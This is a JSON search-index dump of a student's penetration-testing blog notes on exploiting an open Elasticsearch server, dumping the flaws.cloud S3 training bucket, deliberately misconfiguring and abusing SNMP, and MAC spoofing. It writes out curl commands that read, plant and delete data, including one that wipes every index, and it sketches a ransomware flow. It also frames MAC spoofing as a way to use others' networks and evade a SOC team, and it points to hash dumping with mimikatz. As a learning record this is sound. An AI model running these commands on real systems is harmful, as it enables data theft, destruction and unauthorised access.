computer\u0026rsquo;s hostname (which you\u0026rsquo;ve probably named DC1 for \u0026ldquo;Domain Controller 1\u0026rdquo;).\nSeverity: Low. It confirms the server\u0026rsquo;s hostname, which is minor information.\n\u0026quot;cluster_name\u0026quot; : \u0026quot;elasticsearch\u0026quot;\nWhat it is: The name of the entire group of servers (the cluster). Explanation: By default, if you don\u0026rsquo;t specify a cluster name in the elasticsearch.yml file, it calls itself \u0026quot;elasticsearch\u0026quot;. In a real company, this would be something like \u0026quot;prod-analytics-cluster\u0026quot; or \u0026quot;security-logs\u0026quot;. Severity: Low. This just confirms you\u0026rsquo;re using the default name. \u0026quot;cluster_uuid\u0026quot; : \u0026quot;9I15HWO_R9uRAt_sfwczwg\u0026quot;\nWhat it is: A unique ID automatically generated for your entire cluster. Explanation: This ID is used internally by Elasticsearch to make sure nodes are joining the correct cluster and not a different one on the same network. Severity: Low. It\u0026rsquo;s just a random identifier. \u0026quot;version\u0026quot; : { ... }\nWhat it is: This is a JSON object (a block of nested information) that gives extremely precise details about the software version. Severity: Medium. This is very useful for an attacker. Let\u0026rsquo;s break down the inside of the version object: \u0026quot;number\u0026quot; : \u0026quot;7.17.10\u0026quot; What it is: The exact Elasticsearch version. Real-World Severity: Medium-High. This is the most important piece of information here for an attacker. They will immediately take this version number and search for known, published vulnerabilities (CVEs) that affect 7.17.10. Your version is modern, so it\u0026rsquo;s not vulnerable to the old RCE exploits, but an attacker would check. \u0026quot;build_flavor\u0026quot; : \u0026quot;default\u0026quot; What it is: Shows you installed the standard \u0026ldquo;default\u0026rdquo; build. Explanation: The other option is oss (Open Source Software), which would not include the commercial X-Pack features (like security). This confirms you have the full Elastic stack. Severity: Low. \u0026quot;build_type\u0026quot; : \u0026quot;zip\u0026quot; What it is: How the software was installed. Explanation: This tells an attacker you downloaded the .zip file and ran it manually, exactly like you did. Other options would be docker, deb (Debian), or rpm (Red Hat). Severity: Low. \u0026quot;build_hash\u0026quot; : \u0026quot;fecd68e...\u0026quot; What it is: The unique code \u0026ldquo;signature\u0026rdquo; (a git commit hash) for this exact build, used by developers. Severity: Low. \u0026quot;build_date\u0026quot; : \u0026quot;2023-04-23T...\u0026quot; What it is: The exact date and time this version was compiled by the developers. Severity: Low. \u0026quot;lucene_version\u0026quot; : \u0026quot;8.11.1\u0026quot; What it is: The version of Apache Lucene that this Elasticsearch version is built on top of. Explanation: Lucene is the underlying search library that does all the heavy lifting (indexing and searching). Elasticsearch is the user-friendly server and API built around it. Severity: Low to Medium. An advanced attacker might also check for vulnerabilities in this specific Lucene version. \u0026quot;minimum_wire_... and minimum_index_... What it is: These define the oldest versions of other Elasticsearch nodes or indices that this server can communicate with. Severity: Low. This is for internal cluster compatibility. Write / Modify Data (Planting Fake Data): Since there\u0026rsquo;s no security, you can write any data you want. Let\u0026rsquo;s create a new database called test_index and add a \u0026ldquo;hacked\u0026rdquo; record to it. curl -X PUT \u0026#34;http://192.168.83.140:9200/test_index/_doc/1\u0026#34; -H \u0026#39;Content-Type: application/json\u0026#39; -d\u0026#39; { \u0026#34;user\u0026#34;: \u0026#34;attacker\u0026#34;, \u0026#34;message\u0026#34;: \u0026#34;This database is wide open\u0026#34; } \u0026#39; PUT /test_index/_doc/1: This means \u0026ldquo;create or update document \u0026lsquo;1\u0026rsquo; in the 'test_index'. -H 'Content-Type: application/json': Tells the server we are sending it JSON data. -d '{...}': The actual data we are sending. Why it\u0026rsquo;s dangerous: An attacker can modify legitimate records (like changing a user\u0026rsquo;s password) or add fake data (like a fake admin account). Data Exfiltration (Stealing All Data): curl -X GET \u0026#34;http://192.168.83.140:9200/test_index/_search\u0026#34; # another command (alternate) curl -X GET \u0026#34;http://192.168.83.140:9200/test_index/_doc/1\u0026#34; _search: This is the main API for searching. With no filters, it just dumps the contents. Why it\u0026rsquo;s dangerous: This is how attackers steal millions of credit cards, user passwords, and private messages from misconfigured servers. Destruction (Deleting Everything): curl -X DELETE \u0026#34;http://192.168.83.140:9200/test_index\u0026#34; DELETE /test_index: This command permanently deletes the entire test_index. Why it\u0026rsquo;s dangerous: This is irreversible data loss. An attacker could run curl -X DELETE \u0026quot;http://192.168.83.140:9200/_all\u0026quot; to delete every single database on the server. Severity of the misconfigs: This misconfiguration (an open database on a public IP) is considered a CRITICAL vulnerability. It\u0026rsquo;s not a complex software bug; it\u0026rsquo;s the digital equivalent of leaving your company\u0026rsquo;s entire filing cabinet unlocked on the sidewalk.\nMethod 1: Reconnaissance (Listing Indices) Command: curl -X GET \u0026quot;.../_cat/indices?v\u0026quot; Information Gained: A complete list of all database names (e.g., test_index, prod_users, customer_logs). Real-World Severity: High Explanation: This is the attacker\u0026rsquo;s roadmap. They are no longer guessing. They immediately know where the \u0026ldquo;crown jewels\u0026rdquo; are. If they see an index named users, they know it contains user data. If they see credit_card_logs, they know it\u0026rsquo;s a high-value financial target. If they see patient_records, they know they\u0026rsquo;ve hit a healthcare provider and can steal highly sensitive medical data (HIPAA violation). Method 2: Write / Modify Data (Planting Fake Data) Command: curl -X PUT \u0026quot;.../test_index/_doc/1\u0026quot; -d '{...}' Information Gained: The ability to create new data or overwrite existing data. Real-World Severity: Critical Explanation: This is an attack on data integrity. The attacker can: Create Fake Accounts: Add a new document to the users index with their own admin credentials, giving them full access to the application. Modify Financials: Change the balance field in a bank\u0026rsquo;s database or alter a shipping address to steal goods. Website Defacement: Change the text of blog posts or product descriptions stored in the database to display their own message. Plant Malicious Payloads: Insert data containing a script (\u0026lt;script\u0026gt;.../script\u0026gt;). If a web application retrieves this data and displays it on a page without proper filtering, it could lead to XSS (Cross-Site Scripting) attacks against other users. Method 3: Data Exfiltration (Stealing All Data) Command: curl -X GET \u0026quot;.../test_index/_search\u0026quot; Information Gained: The entire contents of the database. Real-World Severity: Critical Explanation: This is the classic data breach you read about in the news. This is how millions of records are stolen. PII Theft: Stealing all user data (names, emails, phone numbers, addresses) for identity theft, phishing, and spam. Credential Theft: Stealing usernames and passwords. Even if passwords are hashed, attackers can crack weak ones offline and then take over accounts. Financial Theft: Stealing unencrypted credit card numbers, bank details, and transaction histories. Intellectual Property Theft: Stealing a company\u0026rsquo;s private business plans, source code, or internal documents. Method 4: Destruction (Deleting Everything) Command: curl -X DELETE \u0026quot;.../test_index\u0026quot; Information Gained: N/A. The goal is pure destruction. Real-World Severity: Critical Explanation: This is a Ransomware or Denial of Service (DoS) attack. Ransomware: This is the most common real-world attack on open databases. The attacker: Runs Method 3 to download a copy of all your data. Runs Method 4 to delete all your original data. Runs Method 2 to leave a single new record in the database named READ_ME containing a ransom note: \u0026ldquo;I have all your data. Pay 10 Bitcoin to this address to get it back. If you don\u0026rsquo;t, I will sell it.\u0026rdquo; Simple Destruction: A competitor or malicious actor simply deletes everything. If the company has no recent backups, it is instantly out of business. All user data, all product data, everything is gone forever. ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/07-performing-network-penetration-testing/09-exploiting-elastic-search-misconfigs/","summary":"\u003col\u003e\n\u003cli\u003eThrough the previous misconfigs, i should have full access to the elastic search database. Let\u0026rsquo;s see and exploit:\u003c/li\u003e\n\u003cli\u003eReconnaissance of the database:\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ecurl -X GET \u003cspan class=\"s2\"\u003e\u0026#34;http://192.168.83.140:9200\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ecurl -X GET \u003cspan class=\"s2\"\u003e\u0026#34;http://192.168.83.140:9200/_cat/indices?v\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cimg alt=\"ese_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/09/ese_1.png\"\u003e\n\u003cimg alt=\"ese_2\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/09/ese_2.png\"\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ccode\u003e_cat/indices\u003c/code\u003e\u003c/strong\u003e: This is the API command to list all indices.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ccode\u003e?v\u003c/code\u003e\u003c/strong\u003e: This makes the output \u0026ldquo;verbose\u0026rdquo; (shows headers), so it\u0026rsquo;s easy to read.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003eWhy it\u0026rsquo;s dangerous:\u003c/strong\u003e This tells the attacker the names of all your databases, such as \u003ccode\u003eprod-users\u003c/code\u003e or \u003ccode\u003ecustomer-logs\u003c/code\u003e.\n\u003cem\u003eEXPLANATION OF THE INFO GATHERED FROM THE FIRST COMMAND:\u003c/em\u003e\n\u003cstrong\u003e\u003ccode\u003e\u0026quot;name\u0026quot; : \u0026quot;DC1\u0026quot;\u003c/code\u003e\u003c/strong\u003e\u003c/p\u003e","title":"Exploiting ElasticSearch Misconfigurations"},{"content":"There are some very well-known cloud providers within the industry: • Amazon Web Services (AWS) • Microsoft Azure • Google Cloud\nA common service that cloud providers usually offer to customers is a storage facility. The AWS storage facility is known as Simple Storage Service (S3). Whenever a customer enables the S3 service, a bucket is created. A bucket is a storage unit within the AWS platform where the customer can add or remove files. In Microsoft Azure, the file storage facility is known as Azure Files. Additionally, on Google Cloud, the storage facility is known as Google Cloud Storage.\nFor this exercise, we are going to use some free online learning resources from http://flaws.cloud. This is a learning environment that\u0026rsquo;s been created by an AWS security professional who is helping the community learn about security vulnerabilities that can exist within AWS S3 misconfigurations. Enumerating AWS S3: Installing s3scanner go install -v github.com/sa7mon/s3scanner@latest s3scanner -h Next, let\u0026rsquo;s use nslookup to obtain the IP addresses of the hosting server for the website: nslookup \u0026gt; flaws.cloud Next, we can attempt to retrieve the hostname that is mapped to the IP address by using the following commands within nslookup: An AWS S3 bucket\u0026rsquo;s URL format is usually in the form of https://bucketname.s3.Region.amazonaws.com. Therefore, by using the information from the URL, the following can be determined: Bucket name: s3-website Region: us-west-2 AWS S3 buckets are not only used to store data such as files. They are also used to host websites. Therefore, we can use flaws.cloud as a prefix to the AWS S3 bucket URL to get the following URL: http://flaws.cloud.s3-website-us-west-2.amazonaws.com/ Visiting this URL will present the same web page as http://flaws.cloud\nVerifying existence of bucket and the available permissions: s3scanner -bucket flaws.cloud Install AWS cli on kali: curl \u0026#34;https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip\u0026#34; -o \u0026#34;awscliv2.zip\u0026#34; sudo apt install unzip -y unzip awscliv2.zip sudo ./aws/install aws --version Then use the command:\naws configure # if you want to(optional) Follow the commands step by step.\nNext, let\u0026rsquo;s attempt to read/view the contents of the AWS S3 bucket using the information aws s3 ls s3://flaws.cloud/ --region us-west-2 --no-sign-request These are the files inside the AWS S3 bucket 6. Downloading the files:\nmkdir s3_Bucket_1 cd s3_Bucket_1 s3scanner dump --bucket flaws.cloud --dumpdir /home/kali/Desktop/a3_Bucket_1/ This command didn\u0026rsquo;t work for me, so i researched and got to know that i can do the same thing with aws cli too\naws s3 cp s3://flaws.cloud /home/kali/Desktop/s3_bucket_1 --recursive --no-sign-request 7. cat the contents of the secret file:\ncat secret-dd02c7c.html Additional reading: • Why is DNSSEC important?: https://www.icann.org/resources/pages/ dnssec-what-is-it-why-important-2019-03-05-en • DNS Zone Transfer Protocol: https://datatracker.ietf.org/doc/html/rfc5936 • Nmap reference guide: https://nmap.org/book/man.html • Information gathering with Metasploit: https://www.offensivesecurity.com/metasploit-unleashed/information-gathering/ • Amazon S3 user guide: https://docs.aws.amazon.com/AmazonS3/latest/userguide/Welcome.html • Amazon S3 Security: https://aws.amazon.com/s3/security/\n","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/04-active-information-gathering/09-finding-data-leaks-on-the-cloud/","summary":"\u003cp\u003eThere are some very well-known cloud providers within the industry:\n• Amazon Web Services (AWS)\n• Microsoft Azure\n• Google Cloud\u003c/p\u003e\n\u003cp\u003eA common service that cloud providers usually offer to customers is a storage facility. \u003cem\u003eThe AWS storage facility is known as Simple Storage Service (S3)\u003c/em\u003e. Whenever a customer enables the S3 service, a \u003cstrong\u003ebucket\u003c/strong\u003e is created. \u003cem\u003eA bucket is a storage unit within the AWS platform where the customer can add or remove files\u003c/em\u003e. In Microsoft Azure, the file storage facility is known as \u003cem\u003eAzure Files\u003c/em\u003e. Additionally, on Google Cloud, the storage facility is known as \u003cem\u003eGoogle Cloud Storage\u003c/em\u003e.\u003c/p\u003e","title":"Finding Data Leaks on the Cloud"},{"content":" Installing SNMP feature on windows server 2019: Using Server Manager: Open Server Manager. Click Manage in the top-right corner and select Add Roles and Features. Click Next until you reach the Features section. Scroll down and check the box for Simple Network Management Protocol (SNMP). Click Add Features in the pop-up window if prompted. Click Next and then Install Using PowerShell :\nOpen PowerShell as an Administrator. Run the following command: Install-WindowsFeature SNMP-Service -IncludeManagementTools Misconfiguration: Configure Vulnerable Settings The primary vulnerability in older SNMP versions (v1 and v2c) comes from using guessable community strings, which act like plaintext passwords. The most common default string is \u0026ldquo;public\u0026rdquo;.\nPress Win + R, type services.msc, and press Enter. Find the SNMP Service in the list, right-click it, and select Properties. Go to the Security tab. This is where you\u0026rsquo;ll set the weak configurations. Set a Weak Community String: Under the Accepted community names section, click Add. Set the Community rights to READ ONLY (or \u0026ldquo;READ WRITE\u0026rdquo; for a more critical vulnerability). In the Community Name box, type public. Click Add. Allow Access from Any Host: Below the community names, select the radio button for Accept SNMP packets from any host. Security Note: In a real environment, this is a major security risk. It allows any device on the network to query your server\u0026rsquo;s SNMP data. For secure setups, you would always choose \u0026ldquo;Accept SNMP packets from these hosts\u0026rdquo; and specify the IP address of your monitoring server. Click Apply and then OK. Restart the Service: Right-click the SNMP Service again in the services.msc window and select Restart to apply all your changes. Your server is now configured with the notoriously insecure \u0026ldquo;public\u0026rdquo; community string, accessible from any host on the network. This setup is ideal for testing vulnerability scanners (like Nmap or Nessus) to see how they detect this misconfiguration.\n","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/07-performing-network-penetration-testing/10-snmp-misconguration/","summary":"\u003col\u003e\n\u003cli\u003eInstalling \u003ccode\u003eSNMP\u003c/code\u003e feature on windows server 2019:\n\u003cstrong\u003eUsing Server Manager:\u003c/strong\u003e\u003c/li\u003e\n\u003cli\u003eOpen \u003cstrong\u003eServer Manager\u003c/strong\u003e.\u003c/li\u003e\n\u003cli\u003eClick \u003cstrong\u003eManage\u003c/strong\u003e in the top-right corner and select \u003cstrong\u003eAdd Roles and Features\u003c/strong\u003e.\u003c/li\u003e\n\u003cli\u003eClick \u003cstrong\u003eNext\u003c/strong\u003e until you reach the \u003cstrong\u003eFeatures\u003c/strong\u003e section.\u003c/li\u003e\n\u003cli\u003eScroll down and check the box for \u003cstrong\u003eSimple Network Management Protocol (SNMP)\u003c/strong\u003e.\u003c/li\u003e\n\u003cli\u003eClick \u003cstrong\u003eAdd Features\u003c/strong\u003e in the pop-up window if prompted.\u003c/li\u003e\n\u003cli\u003eClick \u003cstrong\u003eNext\u003c/strong\u003e and then \u003cstrong\u003eInstall\u003c/strong\u003e\u003c/li\u003e\n\u003c/ol\u003e\n\u003chr\u003e\n\u003cp\u003e\u003cstrong\u003eUsing PowerShell :\u003c/strong\u003e\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003eOpen PowerShell as an Administrator.\u003c/li\u003e\n\u003cli\u003eRun the following command:\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-powershell\" data-lang=\"powershell\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"nb\"\u003eInstall-WindowsFeature\u003c/span\u003e \u003cspan class=\"nb\"\u003eSNMP-Service\u003c/span\u003e \u003cspan class=\"n\"\u003e-IncludeManagementTools\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cimg alt=\"sn_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/10/sn_1.png\"\u003e\u003c/p\u003e","title":"SNMP Misconfiguration"},{"content":" Scanning for SNMP service using NMAP : nmap -sU -sT -p U:161,T:161 192.168.83.140 2. Open msfconsole and use the module named snmp_enum 3. Then run it: It has dumped all the network information like services running, open TCP,UDP ports, network interfaces, file share information, storage information, file system info, device info, software components, processes Using tools other than metasploit: NMAP: nmap -sU -p 161 --script snmp-brute 192.168.83.140 2. snmpset :\nsnmpset -v2c -c public 192.168.83.140 1.3.6.1.2.1.1.4.0 s \u0026#34;Test Contact\u0026#34; -v2c: Specifies SNMP version 2c. -c public: Sets the community string to \u0026ldquo;public\u0026rdquo;. 1.3.6.1.2.1.1.4.0: The OID for sysContact.0. s: Specifies the data type is a \u0026ldquo;string\u0026rdquo;. \u0026quot;Test Contact\u0026quot;: The new value you are trying to write. Verifying that it\u0026rsquo;s been written: through CLI remotely: Using snmpget : snmpget -v2c -c public 192.168.83.140 1.3.6.1.2.1.1.4.0 using snmpwalk : snmpwalk -v2c -c public 192.168.83.140 1.3.6.1.2.1.1.4.0 3. snmp-check :\nsnmp-check 192.168.83.140 -c public -w snmp-check gave us the same amount of information metasploit gave earlier. How to Prevent This Attack The vulnerability is not in the SNMP SET command itself, but in the weak authentication that allows an attacker to use it. Here are the critical defenses:\nNever Use SNMPv1 or v2c with Read-Write Access: This is the root cause. These protocols send the community string (the password) in clear text. Upgrade to SNMPv3: This is the most important fix. SNMPv3 provides strong security by requiring usernames and passwords and, crucially, encrypting all communication. This makes it impossible for an attacker to \u0026ldquo;sniff\u0026rdquo; the credentials or send an unauthorized SET request. Use Strong, Complex Community Strings: If you are absolutely forced to use SNMPv2c, treat the community string like a complex password. Never use \u0026ldquo;public,\u0026rdquo; \u0026ldquo;private,\u0026rdquo; or other guessable words. Use IP Access Control: This is a critical layer of defense. In the Windows SNMP service \u0026ldquo;Security\u0026rdquo; tab, always configure it to \u0026ldquo;Accept SNMP packets from these hosts.\u0026rdquo; Only add the specific IP addresses of your trusted monitoring servers. This blocks requests from an attacker\u0026rsquo;s machine, even if they guess the community string. Audit Your Network: Regularly run Nmap scripts or other vulnerability scanners from a security-testing machine (like Kali) to find any devices you\u0026rsquo;ve missed that are still responding to weak community strings. SNMP best practices: Tier 1: The Best-Practice Solution (Use SNMPv3) The single most important thing you can do is stop using SNMPv1 and v2c. Their community strings are sent in clear text (like a plaintext password) and are trivial to capture.\nUpgrading to SNMPv3 is the correct modern solution. It replaces community strings with a User-based Security Model (USM) that provides:\nAuthentication: Verifies the sender is who they say they are (using MD5 or SHA). Privacy (Encryption): Encrypts the data in transit (using DES or AES). Practical Steps: Disable SNMPv1/v2c on your device (router, switch, server). Enable SNMPv3. Create a User with a strong, unique username. Set an Authentication Password using a strong algorithm (SHA is preferred over MD5). Set a Privacy Password using a strong algorithm (AES is preferred over DES). Configure your monitoring system to use these new SNMPv3 credentials. This authPriv (Authentication + Privacy) security level is the gold standard.\nTier 2: Hardening SNMPv1/v2c (If You Can\u0026rsquo;t Upgrade) If you have legacy devices that only support v1 or v2c, you must apply these hardening steps.\n1. Change Default Community Strings This is non-negotiable. Never, ever use the default strings.\nDefault Read-Only: public Default Read-Write: private Practical Step: Change these to long, complex, randomly-generated passwords. Treat them with the same security as a root password. 2. Implement Access Control Lists (ACLs) This is the most effective way to protect v1/v2c. An ACL acts as a firewall, ensuring that only your monitoring server can send SNMP requests to the device.\nPractical Step:\nIdentify the IP address of your trusted Network Management Station (NMS), for example, 10.1.1.100. Create an access list on your device (router, switch, or server firewall) that only permits UDP port 161 (SNMP) from 10.1.1.100 and denies it from all other IPs. 3. Enforce Read-Only Access Never use read-write access unless you have a specific, temporary administrative task. An attacker with read-write access can change your device\u0026rsquo;s configuration, shut down interfaces, and cause a denial of service.\nPractical Step: Ensure your community string is configured for Read-Only rights.\nOn Windows: In the SNMP Service properties \u0026gt; Security tab, select the community string and ensure its rights are set to READ ONLY. On Linux: In your /etc/snmp/snmpd.conf file, use the rocommunity directive instead of rwcommunity. Tier 3: The Easiest \u0026amp; Safest Step If you don\u0026rsquo;t use SNMP for monitoring, don\u0026rsquo;t leave it running.\nPractical Step: Disable the Service On Windows Server: Open services.msc. Find SNMP Service. Stop the service. Set its Startup type to Disabled. On Linux (systemd): # Stop the service now sudo systemctl stop snmpd # Prevent it from starting on boot sudo systemctl disable snmpd ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/07-performing-network-penetration-testing/11-snmp-exploitation/","summary":"\u003col\u003e\n\u003cli\u003eScanning for SNMP service using \u003ccode\u003eNMAP\u003c/code\u003e :\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enmap -sU -sT -p U:161,T:161 192.168.83.140\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cimg alt=\"sne_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/11/sne_1.png\"\u003e\n2. Open \u003ccode\u003emsfconsole\u003c/code\u003e and use the module named \u003ccode\u003esnmp_enum\u003c/code\u003e\n\u003cimg alt=\"sne_2\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/11/sne_2.png\"\u003e\n3. Then run it:\n\u003cimg alt=\"sne_3\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/11/sne_3.png\"\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eIt has dumped all the network information like  \u003ccode\u003eservices running, open TCP,UDP ports, network interfaces, file share information, storage information, file system info, device info, software components, processes \u003c/code\u003e\n\u003cimg alt=\"sne_4\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/11/sne_4.png\"\u003e\n\u003cimg alt=\"sne_5\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/11/sne_5.png\"\u003e\n\u003cimg alt=\"sne_6\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/11/sne_6.png\"\u003e\n\u003cimg alt=\"sne_7\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/11/sne_7.png\"\u003e\n\u003cimg alt=\"sne_8\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/11/sne_8.png\"\u003e\n\u003cimg alt=\"sne_9\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/11/sne_9.png\"\u003e\n\u003cimg alt=\"sne_10\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/11/sne_10.png\"\u003e\n\u003cimg alt=\"sne_11\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/11/sne_11.png\"\u003e\n\u003cimg alt=\"sne_12\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/11/sne_12.png\"\u003e\n\u003cimg alt=\"sne_13\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/11/sne_13.png\"\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr\u003e\n\u003ch2 id=\"using-tools-other-than-metasploit\"\u003eUsing tools other than metasploit:\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eNMAP:\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enmap -sU -p \u003cspan class=\"m\"\u003e161\u003c/span\u003e --script snmp-brute 192.168.83.140\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cimg alt=\"sne_14\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/11/sne_14.png\"\u003e\n2. \u003ccode\u003esnmpset\u003c/code\u003e :\u003c/p\u003e","title":"SNMP Exploitation"},{"content":"Requirements: Install tmac changer and angry ip scanner tool. Practical demo: Open up angry ip scanner , as well as open a command prompt and type ipconfig to see your ip address. Also check your mac address using the command getmac ![[Pasted image 20251102175926.png]] ![[Pasted image 20251102175942.png]] On angry ip set the ip address range as per your respective ip: ![[Pasted image 20251102180121.png]] Click on the ip column , and double click on mac address which will be on right side, and it will come to the left: ![[Pasted image 20251102175322.png]] Then start the scan. ![[Pasted image 20251102180250.png]] Identified one MAC address, Now we will spoof it, by typing the address inside tmac changer: ![[Pasted image 20251102180412.png]] Before and after MAC address of my device. Internet access will be unavailable for some time because the whole network interface will restart after the mac address change. You should be able to access someone else\u0026rsquo;s internet without giving their login credentials for a private network, and perform critical attacks using the MAC address , we may trick the SOC team. ![[Pasted image 20251102180455.png]] Tracert: tracing internet route We can trace our internet traffic route using the command tracert ![[Pasted image 20251102181159.png]] SAM file location: C:\\Windows\\System32\\config\\ ![[Pasted image 20251102181309.png]]\nWhat is SAM? SAM: Security Accounts Manager Database The Security Accounts Manager (SAM) database is a vital component of Microsoft Windows operating systems, responsible for storing passwords locally on the computer system and maintaining user and account information for authentication to the local system when an account has been created for a user. 1 The SAM database stores passwords in either LAN Manager (LM) hash or NT LAN Manager (NTLM) format, depending on the policies implemented and enforced for password storage. During normal operation, the SAM database cannot be copied due to restrictions enforced by the operating system kernel, and it is stored in two locations within Windows: %systemroot%\\system32\\config\\sam for the main storage and %systemroot%\\repair\\sam._ as a backup for recovery purposes. The SAM database plays a significant role in authentication and access control within Windows, providing system users the ability to authenticate to the local system.\nWe can perform various types of attacks like DLL injection to dump the hashes directly from the memory by injecting a DLL into critical processes such as LSASS(Local Security Authority Subsystem Service) by using tools like mimikatz, pwdump ","permalink":"https://0x-s0M3n4th.github.io/notes/miscellaneous/int-244/mac-address-spoofing/","summary":"\u003ch1 id=\"requirements\"\u003eRequirements:\u003c/h1\u003e\n\u003col\u003e\n\u003cli\u003eInstall \u003ccode\u003etmac changer\u003c/code\u003e and \u003ccode\u003eangry ip scanner\u003c/code\u003e tool.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch1 id=\"practical-demo\"\u003ePractical demo:\u003c/h1\u003e\n\u003col\u003e\n\u003cli\u003eOpen up \u003ccode\u003eangry ip scanner\u003c/code\u003e , as well as open a command prompt and type \u003ccode\u003eipconfig\u003c/code\u003e to see your ip address. Also check your mac address using the command \u003ccode\u003egetmac\u003c/code\u003e\n![[Pasted image 20251102175926.png]]\n![[Pasted image 20251102175942.png]]\u003c/li\u003e\n\u003cli\u003eOn \u003ccode\u003eangry ip\u003c/code\u003e set the ip address range as per your respective ip:\n![[Pasted image 20251102180121.png]]\u003c/li\u003e\n\u003cli\u003eClick on the \u003ccode\u003eip\u003c/code\u003e column , and double click on \u003ccode\u003emac address\u003c/code\u003e which will be on right side, and it will come to the left:\n![[Pasted image 20251102175322.png]]\u003c/li\u003e\n\u003cli\u003eThen start the scan.\n![[Pasted image 20251102180250.png]]\u003c/li\u003e\n\u003cli\u003eIdentified one MAC address, Now we will spoof it, by typing the address inside \u003ccode\u003etmac changer\u003c/code\u003e:\n![[Pasted image 20251102180412.png]]\u003c/li\u003e\n\u003cli\u003eBefore and after \u003ccode\u003eMAC address\u003c/code\u003e of my device. Internet access will be unavailable for some time because the whole network interface will restart after the \u003ccode\u003emac address\u003c/code\u003e change. You should be able to access someone else\u0026rsquo;s internet without giving their login credentials for a private network, and perform critical attacks using the \u003ccode\u003eMAC address\u003c/code\u003e , we may trick the SOC team.\n![[Pasted image 20251102180455.png]]\u003c/li\u003e\n\u003c/ol\u003e\n\u003chr\u003e\n\u003ch2 id=\"tracert-tracing-internet-route\"\u003eTracert: tracing internet route\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eWe can trace our internet traffic route using the command \u003ccode\u003etracert\u003c/code\u003e\n![[Pasted image 20251102181159.png]]\u003c/li\u003e\n\u003c/ol\u003e\n\u003chr\u003e\n\u003ch1 id=\"sam-file-location\"\u003eSAM file location:\u003c/h1\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-powershell\" data-lang=\"powershell\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"n\"\u003eC:\u003c/span\u003e\u003cspan class=\"p\"\u003e\\\u003c/span\u003e\u003cspan class=\"n\"\u003eWindows\u003c/span\u003e\u003cspan class=\"p\"\u003e\\\u003c/span\u003e\u003cspan class=\"n\"\u003eSystem32\u003c/span\u003e\u003cspan class=\"p\"\u003e\\\u003c/span\u003e\u003cspan class=\"n\"\u003econfig\u003c/span\u003e\u003cspan class=\"p\"\u003e\\\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e![[Pasted image 20251102181309.png]]\u003c/p\u003e","title":"Practical Guide: MAC Address Spoofing"},{"content":" About Me I am a 3rd-year student in Lovely Professional University and yes a normal person just like you, my core focus is on Infrastructure Security, Adversary Emulation, Administering different tasks, Blue team operations. Unlike typical red teamers, I believe in mastering the defensive side first—diving deep into Linux \u0026amp; Windows System Administration to understand exactly what I 